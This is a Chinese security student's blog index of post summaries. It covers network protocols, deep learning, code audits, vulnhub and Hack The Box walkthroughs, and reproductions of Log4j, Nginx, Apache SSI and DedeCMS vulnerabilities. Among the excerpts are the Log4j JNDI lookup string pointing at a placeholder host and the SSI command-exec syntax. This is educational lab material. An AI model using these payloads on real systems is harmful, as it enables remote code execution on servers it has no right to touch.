自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(41)
  • 收藏
  • 关注

原创 socks协议详解

Socks(Socket Secure)协议是一种网络协议,处于会话层,用于管理网络连接并提供安全性和隐私保护。通过使用Socks代理服务器,客户端可以隐藏其真实IP地址和其他身份信息,从而匿名地访问互联网上的资源。这篇文章介绍了Socks协议的基本概念和连接过程。Socks协议是一种网络协议,位于会话层,用于管理网络连接并提供安全性和隐私保护。文章详细介绍了Socks客户端和服务器之间建立连接的步骤。此外,文章还介绍了Socks协议中常用的数据包格式和状态码,以及Socks协议的应用场景和优势。

2023-07-17 16:42:11 3090

原创 Kerberos协议详解

Kerberos认证过程复杂,使用多个密钥,且密钥种类不断变换,以防止网络拦截。使用临时生成的Session key,只在当前会话中使用,保证安全性。即使密钥被劫持,也只能在当前会话中起作用。

2023-07-15 00:23:08 821 1

原创 NTLM协议

服务端收到Type 3后取出Net-NTLM Hash,用服务端保存的密码生成的NTLM Hash对challenge加密得到服务端的Net-NTLM Hash,将客户端与服务端计算的Net_NTLM Hash对比,相等则认证成功,否则失败,并将验证结果发送给客户端。客户端收到Type 2后用NTLM Hash对challenge进行加密得到Net-NTLM Hash,将其封装到NTLMSSP_AUTH消息中发往服务端(Type 3认证消息)。用户输入账号和密码,客户端用密码生成NTLM Hash并缓存。

2023-07-13 18:35:08 327

原创 忘机工尺谱 - 快速打谱软件

为了实现高效快速打谱,我实现了一种词谱分离的输入方案,解决了当前工尺谱平台打谱过程频繁切换输入法和频繁点击鼠标等问题,大大提高了打谱效率。同时借鉴了Markdown编辑器”所见即所得“的思想,输入的同时可以见到排版后的工尺谱输出。

2022-11-19 14:34:09 1107 1

原创 深度学习常见优化算法,图解AdaGrad、RMSProp,Adam

该优化算法在较为平缓处学习速率大,有比较高的学习效率,在陡峭处学习率小,在一定程度上可以避免越过极小值点。在SDG优化算法中不能自适应学习率,如图1所示,在函数的初始位置比较平缓,利用AdaGrad优化算法可以很快的到达较优点,而SGD几乎没有移动。如图2所示,初始位置比较陡峭,AdaGrad优化算法会自动调整学习率,然后顺利的到达最优点,而SGD在学习率比较大的情况下会在斜坡两边来回摆动。也就是说在当前梯度与之前梯度之间添加了权重,如果当前梯度的权重较大,那么响应速度也就更快。为常数,表示学习率。

2022-10-14 14:45:02 4042 3

原创 如何通过torch使用梯度下降法( Gradient descent)求函数极小值

有时候通过梯度下降法得到的值不是最优解,有可能是局部最优解,如下图一所示。引入动量的概念时,求最小值就像一个球从高处落下,落到局部最低点时会继续向前探索,有可能得到更小的值,图下图二所示。梯度下降法(Gradient descent,简称GD)是一阶最优化算法,计算过程就是沿梯度下降的方向求解极小值,公式如下所示,其中。随机梯度下降算法是梯度下降算法中的一种,当训练数据只有一条的时候SGD和GD是一样的。动量梯度下降法是动量梯度下降法的一种改进,是将物理学中动量概念引入梯度下降法。,这个方法的作用是将。

2022-10-03 12:52:13 2113

原创 如何使用torch计算梯度,理解Autograd的作用及原理

在PyTorch中主要是通过存储和计算数据,Tensor可以表示数值,向量或矩阵。假设,当x的参数为True时,它跟踪x参与的运算。并且在计算得到的结果上(结果也是Tensor一个对象)上调用backward()就会自动计算x的梯度,并将梯度累加到x.grad属性上。下面代码演示在y=x2y=x^2y=x2,求x=3x=3x=3时的梯度。tensor(6.)

2022-10-02 13:58:38 1824

原创 AKun Wallpaper 代码审计实战分析6

前言通过前面5期的代码审计,我们已经修复了这套系统的绝大部分漏洞,同时也学习到了不少知识。这一篇文章是这一个系列的最后一篇文章,接下来我将继续分析漏洞原理并讲解修复方法。AKun Wallpaper 代码审计实战分析1:https://blog.csdn.net/rpsate/article/details/122354690AKun Wallpaper 代码审计实战分析2:https://blog.csdn.net/rpsate/article/details/122387998AKun Wal

2022-01-16 00:13:48 791 4

原创 AKun Wallpaper 代码审计实战分析5

前言前面四篇文章已经分析出了大部分的严重和高危漏洞,同时分析了这些漏洞的原理和修复方法。在这一篇文章中将继续分析fortify扫描出的漏洞。AKun Wallpaper 代码审计实战分析1:https://blog.csdn.net/rpsate/article/details/122354690AKun Wallpaper 代码审计实战分析2:https://blog.csdn.net/rpsate/article/details/122387998AKun Wallpaper 代码审计实战分析

2022-01-14 23:24:07 3222

原创 AKun Wallpaper 代码审计实战分析4

前言在上一篇文章中重点分析了SQL注入漏洞以及介绍了其修复方案,但是给出的修复方案并没有完全修复SQL注入漏洞。接下来将详细分析未完全修复的SQL注入漏洞的绕过方案和修复方法。漏洞分析1(上一期未完全修复的SQL注入漏洞)审计过程看到 lib/mysql.func.php第28行,其中 $table虽然是可变参数,但是其数据不是用户传递得到的,所以该变量安全。但是 $key是用户传递过来的,它来自$_POST数组中的键,所以该变量用户可控。再注意观察,$key两旁并没有用引,所以这条SQL语句并不需

2022-01-10 20:01:57 3979 3

原创 AKun Wallpaper 代码审计实战分析3

前言在前面我已经介绍了AKun Wallpaper的部署,分析了xss漏洞并且讲解了如何修复这些漏洞。如果还没有看过我前两篇文章的师傅可以先看一下前两篇文章。在这一篇文章中我将重点分析任意文件删除漏洞和sql注入漏洞,然后对漏洞进行复现,最后讲解如何修复这些漏洞。AKun Wallpaper 代码审计实战分析1:https://blog.csdn.net/rpsate/article/details/122354690AKun Wallpaper 代码审计实战分析2:https://blog.csd

2022-01-09 22:20:48 3162 2

原创 AKun Wallpaper 代码审计实战分析2

前言在上一期我已经介绍了AKun Wallpaper的部署,分析了部分xss漏洞并且讲解了如何修复这些漏洞。如果还没有看过我上一期文章可以先回到上一期:https://blog.csdn.net/rpsate/article/details/122354690。在这一篇文章中我将继续分析xss漏洞,但是与上一期中类似的xss漏洞将会直接跳过。漏洞分析1注意下图中标红的 (Shared Sink) - [0/7],这说明有7个数据流共享一个数据输出点。也就是有7个位置接收数据,这7个不同的数据将会在同一

2022-01-08 23:22:34 2022 2

原创 AKun Wallpaper 代码审计实战分析1

前言萌新博主前一段时间一不小心发现了一个漏洞并获取了一个CVE编号,高兴了好一阵子。于是本萌新就想学习一下代码审计,挖一点CVE来玩一玩。最终选择了《代码审计——企业级Web代码安全架构》作为学习资料。学习一阵子后准备进行实战分析,于是就想起了自己多年前写的一个小破站,代码下载地址:https://pan.baidu.com/s/1ViVlsecgwWUig7rVvya31g?pwd=30yw ,提取码:30yw。该网站功能较少,采用函数式编程,代码嵌套少,漏洞较多,十分适合代码审计入门。该网站的功能模块

2022-01-06 22:52:34 4116 4

原创 vulnhub zico2 靶场练习

前言这次练习的靶机是vulnhub平台的zico2。下载地址为:https://www.vulnhub.com/entry/zico2-1,210/。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击zico2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。收集信息通过arp协议扫描局域网,又快又准,但是只能扫描局域网内的ip。arp-scan -l发现靶机的IP地址为 `192.168.

2021-12-22 21:52:06 3366

原创 Log4j远程代码执行漏洞(CVE-2021-44228)漏洞复现

基本信息漏洞编号:CVE-2021-44228影响版本:2.x<=2.15.0-rc1poc地址:https://gitee.com/lcosmos/apache-log4j-poc在此十分感谢我的寝室长Cosmos提供的poc和技术支持。原理简述当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。漏洞

2021-12-11 01:09:43 10335 5

原创 Nginx 解析漏洞 漏洞复现

前言该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。环境搭建漏洞环境使用vulhub搭建,漏洞目录为 vulhub/nginx/nginx_parsing_vulnerability在漏洞目录中执行以下命令即可构建漏洞环境。docker-compose up -d原理分析首先来看不当配置:# php.inicgi.fix_pathinfo=1# php-fpm.confsecurity.limit_extensions为空我们首先来看看cgi.fix_path

2021-10-04 14:32:26 2762

原创 Nginx 配置错误导致漏洞 漏洞复现 (CRLF注入漏洞&目录穿越漏洞)

CRLF注入漏洞nginx的错误配置如下,该配置的用意是让http请求跳转到https请求。其中uri就是我们的访问的地址,该变量可控。其中‘https://uri就是我们的访问的地址,该变量可控。其中`https://uri就是我们的访问的地址,该变量可控。其中‘https://hosturi‘会出现在http响应报文中,这样我们就可以通过改变‘uri`会出现在http响应报文中,这样我们就可以通过改变`uri‘会出现在http响应报文中,这样我们就可以通过改变‘uri`来控制http的响应报文。lo

2021-10-04 10:36:02 4416

原创 Nginx 文件名逻辑漏洞(CVE-2013-4547)漏洞复现

前言影响版本:Nginx 0.8.41 到 1.4.3 / 1.5.0 到 1.5.7。利用条件:php-fpm.conf中的security.limit_extensions为空。建议在学习该漏洞前先学习nginx的原理:https://zhuanlan.zhihu.com/p/136801555。security.limit_extensions设置了就只能解析指定后缀的文件,为空可以解析所有后缀文件。漏洞原理首先来看nginx解析php文件的配置信息:location ~ \.php

2021-10-03 18:55:41 4027 2

原创 Apache SSI 远程命令执行漏洞 漏洞复现

前言&原理如果目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用<!--#exec cmd="命令" -->语法执行任意命令。ssi详细讲解请参考:https://blog.csdn.net/weixin_30399871/article/details/94779816,什么是SSI。ssi漏洞挖掘思路请参考:https://blog.csdn.net/q

2021-09-30 22:49:18 679

原创 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 漏洞复现

前言Apache在2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时,如果文件名最后有一个换行符x0A,apache依然会将其当成php解析,但是在上传文件时可以成功的绕过黑名单。如果上传文件的php程序是设置的白名单,那么这个漏洞将无法利用。漏洞环境该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/CVE-2017-15715。进入该漏洞路径后执行一下命令:docker-compose up -d-d 表示后台运行。注意:该命令必须在漏洞目录下执行,

2021-09-30 22:44:59 3480

原创 Apache HTTPD 多后缀解析漏洞 漏洞复现

前言该漏洞并不是apache程序本身的问题,而是管理员配置不当造成。Apache支持一个文件具有多个后缀,并为不同的后缀执行不同的指令。例如一下配置文件:AddType text/html .htmlAddDefaultCharset GB2312 .gb这个配置文件给 .html后缀添加了媒体格式:text/html,给.gb后缀添加了默认编码:GB2312,如果有一个文件名为 index.gb.html,那么这两个后缀都会生效,它的媒体格式会设置成text/html,默认编码设置成BG2312

2021-09-30 22:36:08 1766 2

原创 vulnhub KioptrixVM3 靶场练习&LotusCMS漏洞分析

前言这次练习的靶机是vulnhub平台下KiptrixVM3,下载地址为https://www.vulnhub.com/entry/kioptrix-level-12-3,24/。该靶机漏洞较多,获取shell的方法多种多样。相对来说比较简单的一种方法就是通过SQL注入获取账号和密码,然后用这些账号密码尝试ssh登陆靶机,本次对靶机的渗透采用的就是SQL注入的方法。SQL注入的原理比较简单,这里就不做过多的介绍,我会在后面重点分析文件包含和远程代码执行漏洞。该靶机导入VMware不会分配到IP地址,因为

2021-09-19 23:38:38 2098

原创 vulnhub sar 靶场练习

前言这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高

2021-09-07 15:39:47 2020 3

原创 vulnhub DC9 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->

2021-09-05 13:21:02 1669 4

原创 vulnhub DC8 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。

2021-09-03 21:53:07 1069 3

原创 vulnhub DC7 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。收集

2021-08-20 23:49:07 1698 3

原创 vulnhub DC6 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第六台,下载地址为https://www.vulnhub.com/entry/dc-6,315/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这次在靶机下载的页面,官方给出的线索,在接下来的破解中需要用到这条线索。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。然后

2021-08-19 17:04:10 519

原创 vulnhub DC5 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第五台,下载地址为https://www.vulnhub.com/entry/dc-5,314/。该靶机的难度系数为中等,该靶机只有一个flag,最终目的的获取root权限,夺取flag。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-5靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。然后需要溢出CD/DVD选项,启动时候会自动检测并连接

2021-08-18 00:17:29 1934 5

原创 vulnhub DC4 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接

2021-08-16 17:51:30 585

原创 vulnhub DC3 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第三台,下载地址为https://www.vulnhub.com/entry/dc-32,312/。该靶机的难度系数为简单,该靶机只有一个flag,只有获取root权限才能获取该flag。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-3靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。然后需要溢出CD/DVD选项,这个启动时候会自动检测并

2021-08-13 19:43:50 2190 5

原创 vulnhub DC2 靶场练习

前言这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为https://www.vulnhub.com/entry/dc-2,311/。该靶机的难度系数为简单,和DC1一样,总共有五个flag。这次虚拟机的配置采用更为简单的一种配置方法。虚拟机配置这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。收集信息nmap -sn --min-p

2021-08-12 12:20:38 1744 2

原创 vulnhub DC1 靶场练习

前言这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。下面就直接开始把。配置靶机和上一台靶机一样,打开没有自动分配到IP。如何配置可以看我上一篇博客https://blog.csdn.net/rpsate/article/details/119494515。但是这一次在配置的最后一步——重启

2021-08-10 20:40:30 1782 1

原创 vulnhub Gigachad 靶场练习

前言这次我们练习的靶机是从vulnhub下载的靶机Gigachad:1,该靶机的难易程度为简单。下载地址为https://www.vulnhub.com/entry/gigachad-1,657/。首先下载下来,导入虚拟机。官网建议使用的虚拟机为Virtualbox,但是我平时用的VMware,所以这次练习就用VMware做演示。导入虚拟机导入虚拟机后把网络连接改为NAT连接模式。桥接模式和NAT模式都是可以的,这里不使用桥接模式是为了避免扫描到C段的其他物理主机。NAT模式下,虚拟机与物理机

2021-08-07 23:19:50 1334 5

原创 通俗理解域的作用

工作组工作组就好像一个标签一样,他的作用仅仅是给计算机一个标注。如果计算机进行了分组,用户在网络邻居中通过工作组(标签)寻找其他计算机会更加便利。工作组的缺点:没有办法同一管理,例如无法统一安装软件,无法统一配置策略等等。没有办法集中身份验证,即访问每一台计算机都要输入单独的账号和密码。如果不理解这两条,继续看下面的类容。下面要讲的域正好解决了这几个缺点。域如果说工作组中的每台计算机地位都平等的,那么域中的计算机地位就有高低之分。域的组织结构更像是党组织。下面通过党组织的形式来说明一下

2021-08-05 20:06:57 3270

原创 hack the box sheild 靶场练习

收集信息首先用nmap对目标主机进行扫描。nmap -sV -sS -F 10.10.10.29-sV 代表扫描端口和开放的服务信息-sS 代表用TCP半开式扫描-F 快速扫描,扫描常用的端口我们发现了这台主机开放了80端口和3306端口,并且这是一台windows系统的服务器。我们首先访问一下这个网站。在这网站什么也没有发现,按F12查看源代码也没有发现有利用价值的URL,点击图片后就跳转到了微软公司的官方网站。我们尝试用目录扫描器扫描一下这个网站。打开dirbuster,在Tar

2021-08-02 23:39:01 870

原创 hack the box vaccine 靶场练习

收集信息连接hack the box服务器后第一步依然是扫描靶机。nmap -sV -sS -F 10.10.10.46-sV 代表扫描端口和开放的服务信息-sS 代表用TCP半开式扫描-F 快速扫描,扫描常用的端口发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。ftp 10.10.10.46 //然后更具提示输入账号和密码ls发现了一个backup.zip,把它下载下来并解压。如果被防火墙拦截则可以开启被

2021-08-01 23:19:07 1759 1

原创 hack the box oopsie 靶场练习

扫描收集信息今天来练习hack the box中的oopsie靶场,如何连接这里不做过多赘述。连接过程可以参考上一篇博客进行了解:https://blog.csdn.net/rpsate/article/details/119190220首先扫描一下端口与服务信息nmap -sV -F 10.10.10.28-sV 代表扫描端口和开放的服务信息-F 快速扫描,扫描常用的端口好我们看到了开放了80端口,应该是一台WEB服务器,我们通过浏览器访问一下这个IP试一下。果然出现了网页,

2021-07-30 23:20:38 1075

原创 hack the box archetype 靶场练习

连接靶机首先下载openvpn的配置文件,建议使用UDP协议进行连接,如果使用TCP协议连接,在最后提权的一步提权的时候可能会失败。总starting point中找到靶机archetype,并点击Join Machine开启靶机。当靶机启动后会显示该靶机的IP地址。但是现在还不能访问该IP地址。需要建立vpn隧道后才能通信。通过openvpn连接到hack the box的服务器。openvpn starting_point_rpsate.ovpn其中starting_point_rpsa

2021-07-28 21:24:51 1269

原创 Dedecms织梦远程写文件漏洞

基本信息漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecmsv5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机云主机ip:192.168.18.131参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/https://seclists.org/fulldisclosure/2015/Jun/472015年6月17日

2021-07-28 14:39:58 842

原创 DeDecms任意用户登录,管理员密码重置漏洞

基本信息漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz参考文章:https://www.seebug.org/vuldb/ssvid-97074前置知识如果要把一个key存储到cookie中,织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时,将key进行加密后与传来的加密k

2021-07-28 14:33:10 3379

忘机工尺谱 工尺谱打谱软件

工尺谱打谱软件,软件已经编译,可直接使用。   为了实现高效快速打谱,我实现了一种词谱分离的输入方案,解决了当前工尺谱平台打谱过程频繁切换输入法和频繁点击鼠标等问题,大大提高了打谱效率。同时借鉴了Markdown编辑器”所见即所得“的思想,输入的同时可以见到排版后的工尺谱输出。 忘机工尺谱设置了两种输入方式,分别为拼音输入模式和数字输入模式,用户可以在菜单栏选择熟自己悉的输入方式。注意:词与谱每行要一一对应,每个词与一段谱对应,每段谱通过空格分开。 强烈建议:先输入词,后输入唱名,最后输入板眼(唱名全部输入完成后通过上下左右键将光标移动到对应位置后输入板眼)。 1.以 # 开头表示标题。 2.以 > 开头或者写在括号内表示夹白。 3.以 = 开头表示念白。 4.以 // 开头表示注释。 5.唱词直接输入即可。 如果用户在编辑框的中间输入词或谱,那么词和谱原本一一对齐的关系将会被打乱,用户只需要点击右边菜单栏上的刷新按钮即可重新将词与谱对齐。

2022-11-19

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除